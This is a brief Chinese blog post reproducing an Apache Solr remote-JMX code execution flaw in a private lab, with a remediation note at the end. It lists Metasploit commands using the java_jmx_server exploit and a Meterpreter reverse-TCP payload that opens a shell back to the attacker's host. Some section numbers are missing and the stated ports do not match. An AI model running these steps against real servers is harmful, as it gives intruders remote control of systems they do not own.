标签:service ORC erp 应用服务 exploit 重启 xpl port 请求
0x00简介0x04漏洞复现
***机:kali IP:192.168.10.147
受害机:Ubuntu18.6中docker IP:192.168.10.184:8983
1、使用nmap扫描端口后发现18983端口开启
2、使用Metasploit中的exploit/multi/misc/java_jmx_server模块进行漏洞复现
? use exploit/multi/misc/java_jmx_server
? set RHOST 192.168.10.184
? set RPORT 18983
再来设置payload:java/meterpreter/reverse_tcp
? set payload java/meterpreter/reverse_tcp
? set LHOST 192.168.10.147
? set LPORT 4444
3、使用run执行,即可看到成功建立连接
0x05修复建议
将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。
标签:service ORC erp 应用服务 exploit 重启 xpl port 请求
原文地址:https://blog.51cto.com/14840650/2510281